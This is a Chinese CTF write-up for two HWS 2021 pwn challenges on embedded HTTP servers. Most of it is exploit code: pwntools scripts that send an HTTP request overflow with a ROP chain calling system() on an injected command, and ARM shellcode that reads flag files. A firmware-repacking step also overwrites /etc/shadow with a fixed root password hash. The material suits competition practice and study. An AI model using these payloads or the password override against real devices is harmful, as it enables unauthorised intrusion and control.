HWS 2021 结营赛 Pwn
source link: https://xuanxuanblingbling.github.io/ctf/pwn/2021/03/06/hws/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
HWS 2021 结营赛 Pwn
发表于 2021-03-06
| 分类于 CTF/Pwn
更新中…结营赛还有非常多值得探索的东西
Pwn1: easyserver
串口看输出
from pwn import *
#context.log_level = 'debug'
p = remote('20.21.2.27', 59816)
pop_r0_pc = 0x0006099c
cmd_base = 0x008ACE4
system = 0x00019158
cmd = 'cat /tmp/207775d1ee9b9efa245fd9fb6fc03b68/flag'
payload = 'POST ./ HTTP1.1;'+cmd+'; \r\n'
payload += 'a'*1100+p32(pop_r0_pc)+ p32(cmd_base+13) + p32(system) +cyclic(100)+'\r\n'+'\r\n'+'\r\n'
print payload
p.send(payload)
p.interactive()
Pwn3: babyhttpd
串口看输出
from pwn import *
#context.log_level = 'debug'
context(arch='arm')
# shellcode = asm('''
# add r4, pc, #56
# str r4, [sp, #8]
# sub r2, r2, r2
# strb r2, [r4, #4]
# sub r2, r2, r2
# add r3, pc, #28
# str r3, [sp, #4]
# str r2, [sp, #12]
# mov r0, r3, lsl r2
# strb r2, [r3, #7]
# add r3, pc, #4
# add r1, sp, #4
# strb r2, [r3, #1]
# swi 0x90ff0b
# ''')+'/bin/ls//tmp'
shellcode = asm('''
add r4, pc, #60
str r4, [sp, #8]
sub r2, r2, r2
strb r2, [r4, #25]
sub r2, r2, r2
add r3, pc, #28
str r3, [sp, #4]
str r2, [sp, #12]
mov r0, r3, lsl r2
strb r2, [r3, #8]
add r3, pc, #4
add r1, sp, #4
strb r2, [r3, #1]
swi 0x90ff0b
''')+'/bin/cat/////tmp/ffffffllllaaaaaagggg'
p = remote('20.21.2.27', 5000)
payload = 'POST /'+"\x11"*6+shellcode+'\r\n\r\n'
payload += 'name='+'a'*655+p32(0x22504)+'&bbb=./;'
p.send(payload)
p.interactive()
板子拿shell
jffs2解包
# Install jefferson to extract JFFS2 file systems
$ sudo pip install cstruct
$ git clone https://github.com/sviehb/jefferson
$ (cd jefferson && sudo python setup.py install)
binwalk -Me test.img
jffs2打包
sudo apt install mtd-utils
mkfs.jffs2 -r rootfs -o rootfs.img
修改start.sh
#!/bin/sh
cp -r /etc /tmp/
echo 'root:$1$NqxdI63c$nzvMkcJxzktGW6Tsgw3jb0:1::::::' > /tmp/etc/shadow
mount -o loop /tmp/etc/ /etc
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK